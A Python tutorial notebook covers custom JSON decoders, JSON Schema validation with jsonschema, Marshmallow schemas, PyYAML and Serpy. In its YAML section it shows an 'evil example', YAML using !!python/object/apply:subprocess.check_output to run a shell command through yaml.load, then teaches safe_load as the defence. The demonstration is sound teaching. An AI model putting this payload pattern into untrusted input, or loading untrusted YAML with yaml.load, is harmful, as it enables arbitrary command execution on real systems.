<_sre.SRE_Match object; span=(0, 19), match='"_type"   : "point"'>


Alternatively, if we don't want to compile it (if we only use it once, there's no real need to do so), we can do a search this way:

In [20]:
re.search(pattern, '"_type"  :  "point"')

<_sre.SRE_Match object; span=(0, 19), match='"_type"  :  "point"'>

OK, now that we have a working regular expression pattern we can implement our custom JSON decoder.

In [21]:
class CustomDecoder(json.JSONDecoder):
    def decode(self, arg):
        obj = json.loads(arg)
        pattern = r'"_type"\s*:\s*"point"'
        if re.search(pattern, arg):
            # we have at least one `Point`
            obj = self.make_pts(obj)
        return obj
    
    def make_pts(self, obj):
        # recursive function to find and replace points
        # received object could be a dictionary, a list, or a simple type
        if isinstance(obj, dict):
            # first see if this dictionary is a point itself
            if '_type' in obj and obj['_type'] == 'point':
                # could have used: if obj.get('_type', None) == 'point'
                obj = Point(obj['x'], obj['y'])
            else:
                # root object is not a point
                # but it could contain a sub-object which itself 
                # is or contains a Point object
                for key, value in obj.items():
                    obj[key] = self.make_pts(value)
        elif isinstance(obj, list):
            for index, item in enumerate(obj):
                obj[index] = self.make_pts(item)
        return obj

In [22]:
j = '''
{
    "a": 100,
    "b": 0.5,
    "rectangle": {
        "corners": {
            "b_left": {"_type": "point", "x": -1, "y": -1},
            "b_right": {"_type": "point", "x": 1, "y": -1},
            "t_left": {"_type": "point", "x": -1, "y": 1},
            "t_right": {"_type": "point", "x": 1, "y": 1}
        },
        "rotate": {"_type" : "point", "x": 0, "y": 0},
        "interior_pts": [
            {"_type": "point", "x": 0, "y": 0},
            {"_type": "point", "x": 0.5, "y": 0.5}
        ]
    }
}
'''

In [23]:
json.loads(j)

{'a': 100,
 'b': 0.5,
 'rectangle': {'corners': {'b_left': {'_type': 'point', 'x': -1, 'y': -1},
   'b_right': {'_type': 'point', 'x': 1, 'y': -1},
   't_left': {'_type': 'point', 'x': -1, 'y': 1},
   't_right': {'_type': 'point', 'x': 1, 'y': 1}},
  'rotate': {'_type': 'point', 'x': 0, 'y': 0},
  'interior_pts': [{'_type': 'point', 'x': 0, 'y': 0},
   {'_type': 'point', 'x': 0.5, 'y': 0.5}]}}

In [24]:
from pprint import pprint
pprint(json.loads(j, cls=CustomDecoder))

{'a': 100,
 'b': 0.5,
 'rectangle': {'corners': {'b_left': Point(x=-1, y=-1),
                           'b_right': Point(x=1, y=-1),
                           't_left': Point(x=-1, y=1),
                           't_right': Point(x=1, y=1)},
               'interior_pts': [Point(x=0, y=0), Point(x=0.5, y=0.5)],
               'rotate': Point(x=0, y=0)}}
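For comparison, the same conversion can be sketched with the `object_hook` argument from the previous section. The hook is called for every JSON object, innermost objects first, so no explicit recursion is needed. This is an alternative to the `decode` override, not a replacement for it, and the function name `point_hook` is only illustrative:

```python
import json

class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __repr__(self):
        return f'Point(x={self.x}, y={self.y})'

def point_hook(arg):
    # arg is always a dict; convert it only if it carries our marker
    if arg.get('_type') == 'point':
        return Point(arg['x'], arg['y'])
    return arg

sample = '''
{
    "rotate": {"_type": "point", "x": 0, "y": 0},
    "interior_pts": [
        {"_type": "point", "x": 0.5, "y": 0.5}
    ]
}
'''
converted = json.loads(sample, object_hook=point_hook)
print(converted)
```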


The `JSONDecoder` class also has arguments such as `parse_int`, `parse_float`, etc. that we saw in the previous lecture.
We can use those to create a customized `JSONDecoder` instance if we want to - let's say we want to use `Decimal` objects instead of floats - just like before, but instead of specifying this each and every time we call `loads`, we can bundle this up into a custom decoder instead:

In [25]:
from decimal import Decimal
CustomDecoder = json.JSONDecoder(parse_float=Decimal)

In [26]:
d = CustomDecoder.decode(j)

In [27]:
pprint(d)

{'a': 100,
 'b': Decimal('0.5'),
 'rectangle': {'corners': {'b_left': {'_type': 'point', 'x': -1, 'y': -1},
                           'b_right': {'_type': 'point', 'x': 1, 'y': -1},
                           't_left': {'_type': 'point', 'x': -1, 'y': 1},
                           't_right': {'_type': 'point', 'x': 1, 'y': 1}},
               'interior_pts': [{'_type': 'point', 'x': 0, 'y': 0},
                                {'_type': 'point',
                                 'x': Decimal('0.5'),
                                 'y': Decimal('0.5')}],
               'rotate': {'_type': 'point', 'x': 0, 'y': 0}}}
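Note that a decoder *instance* like the one above cannot be passed as the `cls` argument of `loads`, which expects a class. One possible way around that, sketched here under the assumption that we only want to change the default for `parse_float`, is a small subclass that sets the option in `__init__` (the name `DecimalDecoder` is made up for this example):

```python
import json
from decimal import Decimal

class DecimalDecoder(json.JSONDecoder):
    def __init__(self, **kwargs):
        # use Decimal unless the caller explicitly asked for something else
        kwargs.setdefault('parse_float', Decimal)
        super().__init__(**kwargs)

parsed = json.loads('{"b": 0.5, "n": 1}', cls=DecimalDecoder)
print(parsed)
```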


Of course, we can combine this with our custom decoder too:

In [28]:
class CustomDecoder(json.JSONDecoder):
    base_decoder = json.JSONDecoder(parse_float=Decimal)
    
    def decode(self, arg):
        obj = self.base_decoder.decode(arg)
        pattern = r'"_type"\s*:\s*"point"'
        if re.search(pattern, arg):
            # we have at least one `Point`
            obj = self.make_pts(obj)
        return obj
    
    def make_pts(self, obj):
        # recursive function to find and replace points
        # received object could be a dictionary, a list, or a simple type
        if isinstance(obj, dict):
            # first see if this dictionary is a point itself
            if '_type' in obj and obj['_type'] == 'point':
                obj = Point(obj['x'], obj['y'])
            else:
                # root object is not a point
                # but it could contain a sub-object which itself 
                # is or contains a Point object nested at some level
                # maybe another dictionary, or a list
                for key, value in obj.items():
                    obj[key] = self.make_pts(value)
        elif isinstance(obj, list):
            # received a list - need to run each item through make_pts
            for index, item in enumerate(obj):
                obj[index] = self.make_pts(item)
        return obj

In [29]:
json.loads(j, cls=CustomDecoder)

{'a': 100,
 'b': Decimal('0.5'),
 'rectangle': {'corners': {'b_left': Point(x=-1, y=-1),
   'b_right': Point(x=1, y=-1),
   't_left': Point(x=-1, y=1),
   't_right': Point(x=1, y=1)},
  'rotate': Point(x=0, y=0),
  'interior_pts': [Point(x=0, y=0), Point(x=0.5, y=0.5)]}}

It's not evident that our `Point(x=0.5, y=0.5)` actually contains `Decimal` objects - that's really just the string representation - so let's just make sure they are indeed `Decimal` objects:

In [30]:
result = json.loads(j, cls=CustomDecoder)
pt = result['rectangle']['interior_pts'][1]
print(type(pt.x), type(pt.y))

<class 'decimal.Decimal'> <class 'decimal.Decimal'>


As you can see, decoding JSON into custom objects is not exactly easy - the basic reason being that JSON does not support anything other than a few simple data types: numbers (integers and floats), strings, booleans, `null`, objects and arrays.

The rest is up to us.

This is one of the reasons there are quite a few 3rd party libraries that allow us to serialize and deserialize JSON objects that follow a certain schema.

I'll discuss some of those in upcoming lectures.

##  JSON Schemas

Often when we work with JSON data, the way the data is formatted is not haphazard - it often conforms to some very precise specification.

For example, REST APIs will conform to some specific format for JSON input and output.

This is called conforming to a **schema**. It is very similar to how relational databases work - we have a schema that precisely defines the columns in tables, the relationships between tables and so on.

One of the main reasons for having these schemas for JSON data is that it allows us to serialize and deserialize the data more easily - we know in advance what the JSON structure will look like, and we can therefore write code that will leverage our understanding of the JSON structure.

There are many ways in which we can define a JSON schema - it could be as simple as creating a Word document that explains how the JSON needs to be structured. That works, but there are better, standards-based approaches.

One of these is the JSON Schema standard:
https://json-schema.org/

We don't need Python, or any programming language, to define a schema - the schema definition is completely language-independent.

But given a JSON schema, we can now use a consistent approach to serializing and deserializing the data.

Moreover, we can also write code to serialize and deserialize specific object types - since we know exactly what to expect in the JSON string.

I am not going to cover JSON Schema in any detail here, but I will show you some simple examples of how these schemas can be defined.

Let's say we are creating an API that responds to a POST method to create some resource - let's say a Person. We want our JSON structure to look like the following:

```
{
    "firstName": "...",
    "middleInitial": "...",
    "lastName": "...",
    "age": ...
}
```

We can start with a simple schema as follows:

In [1]:
person_schema = {
    "type": "object",
    "properties": {
        "firstName": {"type": "string"},
        "middleInitial": {"type": "string"},
        "lastName": {"type": "string"},
        "age": {"type": "number"}
    }
}

The question now becomes, given a JSON string, does it conform to the schema or not?

For example, this one is OK:

In [2]:
p1 = '''
    {
        "firstName": "John",
        "middleInitial": "M",
        "lastName": "Cleese",
        "age": 79
    }
'''

This one, however, does not:

In [3]:
p2 = '''
    {
        "firstName": "John",
        "middleInitial": 100,
        "lastName": "Cleese",
        "age": "Unknown"
    }
'''

`p2` does not conform to our schema for two reasons:
1. "middleInitial" should be a string
2. "age" should be a number

How about this one?

In [4]:
p3 = '''
    {
        "firstName": "John",
        "age": -10.5
    }
'''

Actually this one **does** conform to our schema - unless we indicate a field as required, it is optional.

The `"age"` field is a number, so it also conforms to our schema. But we really would want it to be an integer, and not allow negative numbers.

Fortunately, JSON Schema does allow us to be more specific with our schema:

In [5]:
person_schema = {
    "type": "object",
    "properties": {
        "firstName": {
            "type": "string",
            "minLength": 1
        },
        "middleInitial": {
            "type": "string",
            "minLength": 1,
            "maxLength": 1
        },
        "lastName": {
            "type": "string",
            "minLength": 1
        },
        "age": {
            "type": "integer", 
            "minimum": 0
        }
    },
    "required": ["firstName", "lastName"]
}

So in this schema we require that `"firstName"` and `"lastName"` be provided, and have a minimum number of characters (`1`). We do not make `"middleInitial"` required, but if it is provided it must be one, and exactly one, character long.

The `"age"` field is not required, but if it is provided, it must be a non-negative integer.

The JSON Schema specification is actually quite intricate and can be used to specify schemas with great accuracy and specificity.

For example, we may have a field `"eyeColor"` which must contain (if provided) one of a few specific values: `amber`, `blue`, `brown`, `gray`, `green`, `hazel`, `red`, or `violet`.

We can do this as follows:

In [6]:
person_schema = {
    "type": "object",
    "properties": {
        "firstName": {
            "type": "string",
            "minLength": 1
        },
        "middleInitial": {
            "type": "string",
            "minLength": 1,
            "maxLength": 1
        },
        "lastName": {
            "type": "string",
            "minLength": 1
        },
        "age": {
            "type": "integer", 
            "minimum": 0
        },
        "eyeColor": {
            "type": "string",
            "enum": ["amber", "blue", "brown", "gray", 
                     "green", "hazel", "red", "violet"]
        }
    },
    "required": ["firstName", "lastName"]
}

We can now go back to our original question - determining if a given JSON string conforms to a given schema. We can easily determine if the JSON is valid (we can just do a `loads` for example), but does it conform to the JSON Schema?

We could write Python code to do this ourselves, but that would be really complicated!!
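To give a sense of the effort involved, here is a deliberately tiny sketch that handles only three keywords (`type`, `required` and `properties`) and only string-valued `type` entries. The `check` function, the `TYPES` table and `sketch_schema` are made up for this illustration and are not part of any library:

```python
import json

# A deliberately partial mapping from JSON Schema type names to Python types
TYPES = {
    'object': dict,
    'string': str,
    'integer': int,
    'number': (int, float),
}

def check(instance, schema):
    """Return a list of error messages (empty if no problem was found)."""
    errors = []
    expected = TYPES.get(schema.get('type'))
    if expected is not None:
        # bool is a subclass of int in Python, but JSON booleans are not numbers
        if isinstance(instance, bool) or not isinstance(instance, expected):
            return [f'{instance!r} is not of type {schema["type"]!r}']
    if isinstance(instance, dict):
        for name in schema.get('required', []):
            if name not in instance:
                errors.append(f'{name!r} is a required property')
        for name, sub_schema in schema.get('properties', {}).items():
            if name in instance:
                errors.extend(check(instance[name], sub_schema))
    return errors

sketch_schema = {
    'type': 'object',
    'properties': {
        'firstName': {'type': 'string'},
        'lastName': {'type': 'string'},
        'age': {'type': 'integer'},
    },
    'required': ['firstName', 'lastName'],
}

problems = check(json.loads('{"firstName": "John", "age": "Unknown"}'),
                 sketch_schema)
for problem in problems:
    print(problem)
```

Even this leaves out `minLength`, `maxLength`, `minimum`, `enum` and everything else in the specification.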

Instead, I am going to use the excellent Python library linked here: https://github.com/Julian/jsonschema

You will need to install it first (usually `pip install jsonschema` in whatever environment you are using - you are using a virtual environment of some sort, right?!!)

In [7]:
from jsonschema import validate
from jsonschema.exceptions import ValidationError
from json import loads, dumps, JSONDecodeError

We can use the `validate` function, but it will not work with a string - it needs to be deserialized into a Python dictionary first (which means it will have to be a valid JSON structure first).

In [8]:
print(p1)

try:
    validate(loads(p1), person_schema)
except JSONDecodeError as ex:
    print(f'Invalid JSON: {ex}')
except ValidationError as ex:
    print(f'Validation error: {ex}')
else:
    print('JSON is valid')


    {
        "firstName": "John",
        "middleInitial": "M",
        "lastName": "Cleese",
        "age": 79
    }

JSON is valid


In [9]:
print(p2)

try:
    validate(loads(p2), person_schema)
except JSONDecodeError as ex:
    print(f'Invalid JSON: {ex}')
except ValidationError as ex:
    print(f'Validation error: {ex}')
else:
    print('JSON is valid')


    {
        "firstName": "John",
        "middleInitial": 100,
        "lastName": "Cleese",
        "age": "Unknown"
    }

Validation error: 100 is not of type 'string'

Failed validating 'type' in schema['properties']['middleInitial']:
    {'maxLength': 1, 'minLength': 1, 'type': 'string'}

On instance['middleInitial']:
    100


In [10]:
print(p3)
try:
    validate(loads(p3), person_schema)
except JSONDecodeError as ex:
    print(f'Invalid JSON: {ex}')
except ValidationError as ex:
    print(f'Validation error: {ex}')
else:
    print('JSON is valid')


    {
        "firstName": "John",
        "age": -10.5
    }

Validation error: -10.5 is not of type 'integer'

Failed validating 'type' in schema['properties']['age']:
    {'minimum': 0, 'type': 'integer'}

On instance['age']:
    -10.5


You'll notice that `validate` reports only one validation error. We can instead run the entire validation and get all the validation errors (if any), but this requires a slightly different way of performing validation, using a validator object:

In [11]:
from jsonschema import Draft4Validator

validator = Draft4Validator(person_schema)

In [12]:
for error in validator.iter_errors(loads(p2)):
    print(error, end='\n-----------\n')

100 is not of type 'string'

Failed validating 'type' in schema['properties']['middleInitial']:
    {'maxLength': 1, 'minLength': 1, 'type': 'string'}

On instance['middleInitial']:
    100
-----------
'Unknown' is not of type 'integer'

Failed validating 'type' in schema['properties']['age']:
    {'minimum': 0, 'type': 'integer'}

On instance['age']:
    'Unknown'
-----------


We can also test out the schema for `eyeColor`:

In [13]:
p4 = '''
    {
        "firstName": "John",
        "middleInitial": null,
        "lastName": "Cleese",
        "eyeColor": "blue-gray"
    }
'''

In [14]:
for error in validator.iter_errors(loads(p4)):
    print(error, end='\n-----------\n')    

None is not of type 'string'

Failed validating 'type' in schema['properties']['middleInitial']:
    {'maxLength': 1, 'minLength': 1, 'type': 'string'}

On instance['middleInitial']:
    None
-----------
'blue-gray' is not one of ['amber', 'blue', 'brown', 'gray', 'green', 'hazel', 'red', 'violet']

Failed validating 'enum' in schema['properties']['eyeColor']:
    {'enum': ['amber',
              'blue',
              'brown',
              'gray',
              'green',
              'hazel',
              'red',
              'violet'],
     'type': 'string'}

On instance['eyeColor']:
    'blue-gray'
-----------


So JSON Schema paired with this library is a great way to ensure a JSON document conforms to some specific schema. It is useful even when you create your own JSON serializer to make sure you are conforming to your own pre-determined schema - especially useful in unit testing to make sure you did not miss something when serializing your objects to JSON.

But all this does not address the other issue we have - serializing and deserializing Python objects to and from JSON strings (marshalling).

Not to worry, there are also quite a few libraries out there that will help with this difficult task too.

In the next video I will look at one of the more popular ones - Marshmallow - but there are others as well.

##  Marshmallow

Marshmallow gets its name from "marshalling" - in other words it is a library that can be used to "translate" between complex data types (such as custom objects) and simple data types (such as dictionaries or lists of strings, integers, etc.), sometimes called native data types, which can then easily be serialized to and deserialized from a JSON format.
At the same time, it can also perform validation.

Marshmallow is very customizable, and I am not going to go into a whole lot of detail here, other than show you a few examples.

If you want more info about this great Python library, you can read up about it here: https://marshmallow.readthedocs.io/en/3.0/


As might be expected, we still declare some sort of schema for our data - there's no magic here!

Let's first see how we might create a simple schema for our `Person` object.

We start by creating the class itself that we will use in our app:

In [1]:
class Person:
    def __init__(self, first_name, last_name, dob):
        self.first_name = first_name
        self.last_name = last_name
        self.dob = dob
        
    def __repr__(self):
        return f'Person({self.first_name}, {self.last_name}, {self.dob})'

In [2]:
from datetime import date

p1 = Person('John', 'Cleese', date(1939, 10, 27))

In [3]:
p1

Person(John, Cleese, 1939-10-27)

So we want to serialize and deserialize this `Person` object into a simple dictionary containing strings, including an ISO formatted string for the date of birth.

In [4]:
from marshmallow import Schema, fields

In [5]:
class PersonSchema(Schema):
    first_name = fields.Str()
    last_name = fields.Str()
    dob = fields.Date()

We can now create a schema instance that will handle any object type that has the `first_name`, `last_name` and `dob` fields. You'll notice that we used Marshmallow specific data types for strings and dates. Marshmallow has many other data types too to handle Booleans, numbers (integers, reals, even decimals), datetime, email, url, etc.

We first have to create an instance of the `PersonSchema` class:

In [6]:
person_schema = PersonSchema()

We can serialize our custom object into a "simple" dictionary:

In [7]:
person_schema.dump(p1)

MarshalResult(data={'first_name': 'John', 'dob': '1939-10-27', 'last_name': 'Cleese'}, errors={})

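As you can see we have two properties here: `data` and `errors`. The `data` property will contain our serialized data, and the `errors` property will tell us if any errors were encountered while serializing our objects. (This `MarshalResult` wrapper is what Marshmallow 2.x returns; in Marshmallow 3, `dump` returns the serialized data directly.)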

In [8]:
type(person_schema.dump(p1).data)

dict

We can also serialize our objects directly to JSON using `dumps`:

In [9]:
person_schema.dumps(p1).data

'{"first_name": "John", "dob": "1939-10-27", "last_name": "Cleese"}'

We can use other objects, not necessarily of `Person` type, and if those fields are present they will be used in the serialization:

In [10]:
from collections import namedtuple

PT=namedtuple('PT', 'first_name, last_name, dob')

In [11]:
p2 = PT('Eric', 'Idle', date(1943, 3, 29))

In [12]:
person_schema.dumps(p2).data

'{"first_name": "Eric", "dob": "1943-03-29", "last_name": "Idle"}'

But if we use an object that does not have the required fields:

In [13]:
PT2 = namedtuple('PT2', 'first_name, last_name, age')
p3 = PT2('Michael', 'Palin', 75)

In [14]:
person_schema.dumps(p3).data

'{"first_name": "Michael", "last_name": "Palin"}'

As you can see Marshmallow here only uses what it can.
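To make that behavior concrete, here is a stdlib-only sketch of the same idea: read each declared field from the object if it is present, convert it, and skip it otherwise. This is **not** how Marshmallow is implemented; the `FIELDS` table and `simple_dump` function are hypothetical and only mimic the output seen above.

```python
from collections import namedtuple
from datetime import date

# Hypothetical "schema": field name -> function producing a simple value
FIELDS = {
    'first_name': str,
    'last_name': str,
    'dob': date.isoformat,
}

def simple_dump(obj):
    result = {}
    for name, convert in FIELDS.items():
        # fields missing from the object are skipped, not reported as errors
        if hasattr(obj, name):
            result[name] = convert(getattr(obj, name))
    return result

PT = namedtuple('PT', 'first_name, last_name, dob')
PT2 = namedtuple('PT2', 'first_name, last_name, age')

with_dob = simple_dump(PT('Eric', 'Idle', date(1943, 3, 29)))
without_dob = simple_dump(PT2('Michael', 'Palin', 75))
print(with_dob)
print(without_dob)
```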

What's interesting is that we can also specify what fields should occur in the serialized output, using `only` to specify inclusions, or `exclude` to specify exclusions:

In [15]:
person_partial = PersonSchema(only=('first_name', 'last_name'))

In [16]:
person_partial.dumps(p1).data

'{"first_name": "John", "last_name": "Cleese"}'

Equivalently:

In [17]:
person_partial = PersonSchema(exclude=['dob'])

In [18]:
person_partial.dumps(p1).data

'{"first_name": "John", "last_name": "Cleese"}'

What happens if we have the wrong data type for those fields?

In [19]:
p4 = Person(100, None, 200)

In [20]:
person_schema.dumps(p4)

MarshalResult(data='{"first_name": "100", "last_name": null}', errors={'dob': ['"200" cannot be formatted as a date.']})

As you can see, the `errors` property tells us that the data value could not be interpreted as a date.

On the other hand the values `100` and `None` for the string values were fine - the integer was converted into a string, and the `None` value for `last_name` was retained.

Our schemas can also get more complicated, including sub-schemas based on other schemas.

For example, we can define a `Movie` schema that includes a movie title, year of release, and a list of actors:

In [21]:
class Movie:
    def __init__(self, title, year, actors):
        self.title = title
        self.year = year
        self.actors = actors

In [22]:
class MovieSchema(Schema):
    title = fields.Str()
    year = fields.Integer()
    actors = fields.Nested(PersonSchema, many=True)

In [23]:
p1, p2

(Person(John, Cleese, 1939-10-27),
 PT(first_name='Eric', last_name='Idle', dob=datetime.date(1943, 3, 29)))

In [24]:
parrot = Movie('Parrot Sketch', 1989, [p1, 
                                       Person('Michael', 
                                              'Palin', 
                                              date(1943, 5, 5))
                                      ])

In [25]:
MovieSchema().dumps(parrot)

MarshalResult(data='{"title": "Parrot Sketch", "year": 1989, "actors": [{"first_name": "John", "dob": "1939-10-27", "last_name": "Cleese"}, {"first_name": "Michael", "dob": "1943-05-05", "last_name": "Palin"}]}', errors={})

There's a lot more we can do to control serialization - take a look at the documentation if you want to learn more.

Now, let's look at deserialization a little bit.

To deserialize a simple dictionary we use the `load` method, which is basically the opposite of what `dump` does. To deserialize a JSON string we use the `loads` method.

Let's recall our Person schema:

In [26]:
class PersonSchema(Schema):
    first_name = fields.Str()
    last_name = fields.Str()
    dob = fields.Date()

And let's deserialize a dictionary:

In [27]:
person_schema = PersonSchema()

In [28]:
person_schema.load(dict(first_name='John',
                        last_name='Cleese',
                        dob='1939-10-27'))

UnmarshalResult(data={'first_name': 'John', 'dob': datetime.date(1939, 10, 27), 'last_name': 'Cleese'}, errors={})

So you can see we get this `UnmarshalResult` object back, with a `data` property - notice how the data was converted from a string into an actual date object.

But we still did not get a `Person` object back in `data`. Instead we got a plain dictionary back - ultimately we may want a `Person` object.

To do this, we need to tell Marshmallow what object to use when it deserializes our data:

In [29]:
from marshmallow import post_load

class PersonSchema(Schema):
    first_name = fields.Str()
    last_name = fields.Str()
    dob = fields.Date()
    
    @post_load
    def make_person(self, data):
        return Person(**data)

In [30]:
person_schema = PersonSchema()

In [31]:
person_schema.load(dict(first_name='John',
                        last_name='Cleese',
                        dob='1939-10-27'))

UnmarshalResult(data=Person(John, Cleese, 1939-10-27), errors={})

And now you can see that `data` contains a `Person` object.

So now let's go ahead and fix up our `MovieSchema` as well:

In [32]:
class MovieSchema(Schema):
    title = fields.Str()
    year = fields.Integer()
    actors = fields.Nested(PersonSchema, many=True)
    
    @post_load
    def make_movie(self, data):
        return Movie(**data)

In [33]:
movie_schema = MovieSchema()

Here we're going to load from a JSON string to see that it works equally well:

In [34]:
json_data = '''
{"actors": [
    {"first_name": "John", "last_name": "Cleese", "dob": "1939-10-27"}, 
    {"first_name": "Michael", "last_name": "Palin", "dob": "1943-05-05"}], 
"title": "Parrot Sketch", 
"year": 1989}
'''

In [35]:
movie = movie_schema.loads(json_data).data

In [36]:
type(movie)

__main__.Movie

In [37]:
movie.title, movie.year

('Parrot Sketch', 1989)

In [38]:
movie.actors

[Person(John, Cleese, 1939-10-27), Person(Michael, Palin, 1943-05-05)]

There is a **lot** more that this library can do - we did not even touch on validation here (required fields for example), nor how you can manipulate serialization and deserialization in many different ways, including handling of missing values, and much much more. If you are going to work with complex objects and have to deal with JSON (or other) marshalling, I strongly urge you to consider this library. It has a bit of a learning curve, but is well worth the effort!

There are others out there as well. `Colander`, part of the `Pyramid` project, is also popular with people using `Pyramid`. Personally I just find `Marshmallow` more powerful and pleasant to work with.

##  YAML Format

YAML, like JSON, is another data serialization standard. It is generally easier to read than JSON, and although it has been around for a long time (since 2001), it has become especially popular in the DevOps world for configuration files (Docker, Kubernetes, etc).

Like JSON it is able to represent simple data types (strings, numbers, boolean, etc) as well as collections and associative arrays (dictionaries).

YAML focuses on human readability, and is a little more complex to parse.

Here is a sample YAML file:

```
title: Parrot Sketch
year: 1989
actors:
    - first_name: John
      last_name: Cleese
      dob: 1939-10-27
    - first_name: Michael
      last_name: Palin
      dob: 1943-05-05
```

As you can see this is much easier to read than JSON or XML.

To parse YAML into a Python dictionary would take a fair amount of work - especially since YAML is quite flexible.

Fortunately, we can use the third-party library `pyyaml` to do this for us.

Again, I'm only going to show you a tiny bit of this library, and you can read more about it here:
https://pyyaml.org/wiki/PyYAMLDocumentation

(It's definitely less of a learning curve than Marshmallow!!)

#### Caution
When you load a YAML file using `pyyaml`, be careful: like unpickling, loading can call out to Python functions, so do not load untrusted YAML files using `pyyaml`! Note also that PyYAML 6.0 and later require an explicit `Loader` argument when calling `yaml.load`.

In [1]:
import yaml

In [2]:
data = '''
---
title: Parrot Sketch
year: 1989
actors:
    - first_name: John
      last_name: Cleese
      dob: 1939-10-27
    - first_name: Michael
      last_name: Palin
      dob: 1943-05-05
'''

In [3]:
d = yaml.load(data)

In [4]:
type(d)

dict

In [5]:
from pprint import pprint

pprint(d)

{'actors': [{'dob': datetime.date(1939, 10, 27),
             'first_name': 'John',
             'last_name': 'Cleese'},
            {'dob': datetime.date(1943, 5, 5),
             'first_name': 'Michael',
             'last_name': 'Palin'}],
 'title': 'Parrot Sketch',
 'year': 1989}


You'll notice that unlike the built-in JSON parser, PyYAML was able to automatically deduce the `date` type in our YAML, in addition to strings and integers.
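
For comparison, here is a small sketch of what it takes to get the same result from the standard library `json` module: dates arrive as plain strings, and we have to convert them ourselves, for example with an `object_hook`. The function name `parse_dob` is just an illustrative choice, and the sketch assumes dates are always stored under a `dob` key in `YYYY-MM-DD` format.

```python
import json
from datetime import datetime

json_data = '''
{"title": "Parrot Sketch",
 "year": 1989,
 "actors": [
    {"first_name": "John", "last_name": "Cleese", "dob": "1939-10-27"},
    {"first_name": "Michael", "last_name": "Palin", "dob": "1943-05-05"}]}
'''

# Without help, json leaves the date as a string
raw = json.loads(json_data)


def parse_dob(d):
    # object_hook is called with every JSON object (dict) that gets decoded
    if 'dob' in d:
        d['dob'] = datetime.strptime(d['dob'], '%Y-%m-%d').date()
    return d


converted = json.loads(json_data, object_hook=parse_dob)
```

In `raw` the `dob` values are still strings, while in `converted` they are `datetime.date` objects, which is what PyYAML gave us without any extra code.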

Of course, serialization works the same way:

In [6]:
d = {'a': 100, 'b': False, 'c': 10.5, 'd': [1, 2, 3]}

In [7]:
print(yaml.dump(d))

a: 100
b: false
c: 10.5
d: [1, 2, 3]



You'll notice in the above example that the list was represented using `[1, 2, 3]` - this is valid YAML as well, and is equivalent to this notation:

```
d:
    - 1
    - 2
    - 3
```

If you prefer this block style, you can force it this way:

In [8]:
print(yaml.dump(d, default_flow_style=False))

a: 100
b: false
c: 10.5
d:
- 1
- 2
- 3



What's interesting about PyYAML is that it can also automatically serialize and deserialize complex objects:

In [9]:
class Person:
    def __init__(self, name, dob):
        self.name = name
        self.dob = dob
        
    def __repr__(self):
        return f'Person(name={self.name}, dob={self.dob})'

In [10]:
from datetime import date

p1 = Person('John Cleese', date(1939, 10, 27))
p2 = Person('Michael Palin', date(1934, 5, 5))

In [11]:
print(yaml.dump({'john': p1, 'michael': p2}))

john: !!python/object:__main__.Person {dob: 1939-10-27, name: John Cleese}
michael: !!python/object:__main__.Person {dob: 1934-05-05, name: Michael Palin}



Notice that weird looking syntax? It's actually useful when we deserialize the YAML string - of course it means a `Person` class must be defined (under the same module path) when we load the data. PyYAML restores the attributes directly rather than calling `__init__`.

In [12]:
yaml_data = '''
john: !!python/object:__main__.Person 
    dob: 1939-10-27
    name: John Cleese
michael: !!python/object:__main__.Person 
    dob: 1934-05-05
    name: Michael Palin
'''

In [13]:
d = yaml.load(yaml_data)

In [14]:
d

{'john': Person(name=John Cleese, dob=1939-10-27),
 'michael': Person(name=Michael Palin, dob=1934-05-05)}

As you can see, `john` and `michael` were deserialized into `Person` type objects.

This is why you have to be quite careful with the source of any YAML you deserialize.

Here's an evil example:

In [15]:
yaml_data = '''
exec_paths: 
    !!python/object/apply:os.get_exec_path []
exec_command:
    !!python/object/apply:subprocess.check_output [['ls', '/']]
'''

In [16]:
yaml.load(yaml_data)

{'exec_paths': ['/Users/fbaptiste/anaconda3/envs/deepdive/bin',
  '/Users/fbaptiste/anaconda3/envs/deepdive/bin',
  '/Users/fbaptiste/anaconda3/bin',
  '/usr/local/bin',
  '/usr/bin',
  '/bin',
  '/usr/sbin',
  '/sbin'],
 'exec_command': b'Applications\nLibrary\nNetwork\nSystem\nUsers\nVolumes\nbin\ncores\ndev\netc\nhome\ninstaller.failurerequests\nnet\nprivate\nsbin\ntmp\nusr\nvar\n'}

So, be very careful with `load`. In general it is safer practice to use the `safe_load` method instead, but you will lose the ability to deserialize into custom Python objects, unless you override that behavior. You can always use Marshmallow to do that secondary step in a safer way.

In [17]:
yaml.safe_load(yaml_data)

ConstructorError: could not determine a constructor for the tag 'tag:yaml.org,2002:python/object/apply:os.get_exec_path'
  in "<unicode string>", line 3, column 5:
        !!python/object/apply:os.get_exe ... 
        ^

To override and allow certain Python objects to be deserialized in `safe_load` we can proceed this way.

First, we are going to simplify the object tag notation by customizing it in our `Person` class, and we are also going to mark our class as safe to deserialize. Our `Person` class will now have to inherit from `yaml.YAMLObject`:

In [18]:
from yaml import YAMLObject, SafeLoader

class Person(YAMLObject):
    yaml_tag = '!Person'
    
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

First let's see how objects are now serialized:

In [19]:
yaml.dump(dict(john=Person('John Cleese', 79),
               michael=Person('Michael Palin', 74)))

'john: !Person {age: 79, name: John Cleese}\nmichael: !Person {age: 74, name: Michael Palin}\n'

As you can see we have a slightly cleaner syntax.

Now let's try to load the serialized version:

In [20]:
yaml_data = '''
john: !Person
    name: John Cleese
    age: 79
michael: !Person
    name: Michael Palin
    age: 74
'''

In [21]:
yaml.load(yaml_data)

{'john': Person(name=John Cleese, age=79),
 'michael': Person(name=Michael Palin, age=74)}

And `safe_load`:

In [22]:
yaml.safe_load(yaml_data)

ConstructorError: could not determine a constructor for the tag '!Person'
  in "<unicode string>", line 2, column 7:
    john: !Person
          ^

So now let's mark our `Person` object as safe:

In [23]:
class Person(YAMLObject):
    yaml_tag = '!Person'
    yaml_loader = SafeLoader
    
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [24]:
yaml.safe_load(yaml_data)

{'john': Person(name=John Cleese, age=79),
 'michael': Person(name=Michael Palin, age=74)}

And as you can see, the deserialization now works for the `Person` class.

There's a lot more this library can do, so look at the reference if you want to use YAML.

Also, as I mentioned before, you can combine this with `Marshmallow`, for example, to get a full marshalling solution for complex (custom) Python types.

##  Serpy

If you're just looking for serialization, then `Serpy` might work for you. It is extremely fast, but only provides serialization (no deserialization).

You can read more about Serpy here: https://serpy.readthedocs.io/en/latest/

Here's a simple example first, using our go-to `Person` object.

